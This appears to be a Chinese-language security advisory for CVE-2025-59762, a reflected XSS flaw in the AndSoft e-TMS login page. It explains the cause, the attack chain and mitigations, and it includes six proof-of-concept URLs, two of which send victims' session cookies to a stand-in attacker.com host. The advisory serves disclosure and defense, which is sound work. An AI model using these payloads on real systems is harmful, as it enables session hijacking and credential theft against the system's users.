CVE-2025-59762：AndSoft e-TMS 反射型跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-59762

漏洞类型

反射型跨站脚本（Reflected XSS）

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

AndSoft e-TMS

漏洞概述

CVE-2025-59762 是 AndSoft 公司开发的 e-TMS（Electronic Transport Management System，电子运输管理系统）v25.03 版本中存在的一个反射型跨站脚本（Reflected XSS）漏洞。该漏洞于2025年10月2日由西班牙国家网络安全研究所（INCIBE）披露，CVSS 3.1 基础评分为 6.1 分，属于中危级别。

AndSoft e-TMS 是一款广泛应用于物流和运输行业的运输管理系统，用于管理车队、订单、运输路线等业务。该系统在用户登录页面 `/clt/LOGINFRM_DLG.ASP` 中存在多个未经过滤的输入参数，包括 `l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn` 等参数。攻击者可以通过构造包含恶意 JavaScript 代码的 URL，诱使受害者点击该链接，从而在受害者的浏览器上下文中执行任意 JavaScript 代码。

由于该漏洞为反射型 XSS，恶意脚本不会持久存储在服务器端，而是通过 URL 参数即时反射到响应页面中。攻击者需要诱导用户点击特制的恶意链接才能触发漏洞利用。该漏洞可能导致会话劫持、钓鱼攻击、敏感信息窃取等安全问题，对使用 e-TMS 系统的企业和用户构成潜在威胁。

技术细节

该漏洞的根本原因在于 AndSoft e-TMS v25.03 的登录页面 `/clt/LOGINFRM_DLG.ASP` 对用户输入参数缺乏充分的过滤和转义处理。具体而言，页面中以下参数：`l`、`demo`、`demo2`、`TNTLOGIN`、`UO` 和 `SuppConn`，在服务器端处理后未经 HTML 实体编码便直接输出到响应页面中。

攻击者利用该漏洞的方式如下：首先，攻击者构造一个包含恶意 JavaScript 脚本的 URL，例如在参数值中注入 `<script>alert(document.cookie)</script>` 或更复杂的 payload（如窃取 cookie、会话令牌或执行钓鱼操作的代码）。然后，攻击者通过社会工程学手段（如邮件、即时消息等）将该 URL 发送给目标用户。当受害者点击该链接时，浏览器向 e-TMS 服务器发起请求，服务器将恶意参数值嵌入到返回的 HTML 页面中。由于浏览器将嵌入的脚本视为合法页面内容执行，攻击者的 JavaScript 代码将在受害者的浏览器上下文中运行。

该漏洞的 CVSS 向量为 `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`，表明攻击通过网络进行、攻击复杂度低、无需权限但需要用户交互（如点击链接），影响范围可发生变化（Scope Changed），对机密性和完整性有低影响，不影响可用性。Scope 变化意味着 XSS 攻击突破了原始安全上下文，可访问其他安全域的资源。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统使用 AndSoft e-TMS v25.03 版本，并定位存在漏洞的登录页面 /clt/LOGINFRM_DLG.ASP 及可注入参数（l、demo、demo2、TNTLOGIN、UO、SuppConn）。

STEP 2

步骤2：构造恶意 URL

攻击者在 URL 参数中注入恶意 JavaScript 代码，例如窃取 cookie、重定向到钓鱼页面或执行其他恶意操作的 payload。

STEP 3

步骤3：社会工程诱导

攻击者通过钓鱼邮件、即时消息或其他渠道将恶意 URL 发送给 e-TMS 系统的合法用户，诱使其点击。

STEP 4

步骤4：触发 XSS 执行

受害者点击恶意链接后，浏览器向 e-TMS 服务器发起请求，服务器将未转义的恶意脚本嵌入到返回的 HTML 响应中，浏览器执行该脚本。

STEP 5

步骤5：数据窃取或恶意操作

恶意脚本在受害者浏览器上下文中执行，可窃取会话 cookie、进行钓鱼攻击、窃取敏感数据或执行其他未授权操作。由于 Scope 变化，攻击可能影响其他安全域。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-59762 - Reflected XSS PoC for AndSoft e-TMS v25.03 -->
<!-- Vulnerable endpoint: /clt/LOGINFRM_DLG.ASP -->
<!-- Vulnerable parameters: l, demo, demo2, TNTLOGIN, UO, SuppConn -->

<!-- PoC 1: Basic alert box via 'l' parameter -->
https://target/clt/LOGINFRM_DLG.ASP?l=<script>alert('XSS-CVE-2025-59762')</script>

<!-- PoC 2: Cookie stealing via 'demo' parameter -->
https://target/clt/LOGINFRM_DLG.ASP?demo=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

<!-- PoC 3: Using 'TNTLOGIN' parameter with event handler -->
https://target/clt/LOGINFRM_DLG.ASP?TNTLOGIN=<img src=x onerror=alert(document.domain)>

<!-- PoC 4: Using 'UO' parameter -->
https://target/clt/LOGINFRM_DLG.ASP?UO=<svg onload=alert('XSS')>

<!-- PoC 5: Using 'SuppConn' parameter -->
https://target/clt/LOGINFRM_DLG.ASP?SuppConn="><script>alert('CVE-2025-59762')</script>

<!-- PoC 6: Session hijacking payload via 'demo2' parameter -->
https://target/clt/LOGINFRM_DLG.ASP?demo2=<script>fetch('https://attacker.com/log?session='+encodeURIComponent(document.cookie))</script>

影响范围

AndSoft e-TMS v25.03

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1）在 Web 服务器或反向代理层面部署 WAF 规则，过滤常见的 XSS payload 特征（如 <script> 标签、onerror/onload 事件处理器等）；2）对 /clt/LOGINFRM_DLG.ASP 页面的 URL 参数实施输入过滤，拒绝包含特殊字符（<、>、"、'、& 等）的请求；3）配置 CSP 响应头，限制内联脚本执行；4）为所有会话 Cookie 设置 HTTPOnly 属性，限制 JavaScript 访问；5）对终端用户进行安全意识培训，警惕可疑链接；6）监控 Web 服务器日志，识别异常的 URL 请求模式。